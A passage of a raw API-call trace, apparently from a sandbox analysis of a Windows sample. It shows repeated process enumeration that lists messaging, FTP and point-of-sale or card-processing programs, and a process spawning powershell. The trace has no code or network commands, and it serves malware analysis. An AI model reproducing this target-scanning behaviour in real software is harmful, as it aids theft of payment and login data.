cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0220.393] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0220.395] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0220.397] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0220.398] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0220.404] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0220.406] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0220.408] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0220.409] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0220.411] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0220.413] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0220.416] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0220.493] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0220.496] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0220.498] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0220.500] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0220.502] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0220.504] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0220.506] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0220.507] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0220.510] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0220.512] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0220.514] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0220.516] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0220.518] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0220.519] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0220.521] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0220.523] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0220.525] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.526] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0220.528] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0220.551] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.553] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.555] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0220.557] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0220.558] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0220.560] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.561] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0220.568] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0220.569] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0220.571] CloseHandle (hObject=0x1eb8) returned 1 [0220.571] Sleep (dwMilliseconds=0x64) [0220.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0220.586] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.588] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.589] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.591] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.592] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.609] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.610] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.612] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.615] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.617] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.618] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.620] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.621] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.623] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.624] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.626] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.627] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.629] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.630] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.632] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.633] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0220.635] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.636] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0220.638] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.640] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0220.641] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0220.682] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0220.683] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0220.685] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.686] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0220.688] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.690] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.691] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0220.693] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.694] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0220.696] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.697] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0220.700] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0220.702] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0220.703] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0220.705] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0220.706] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 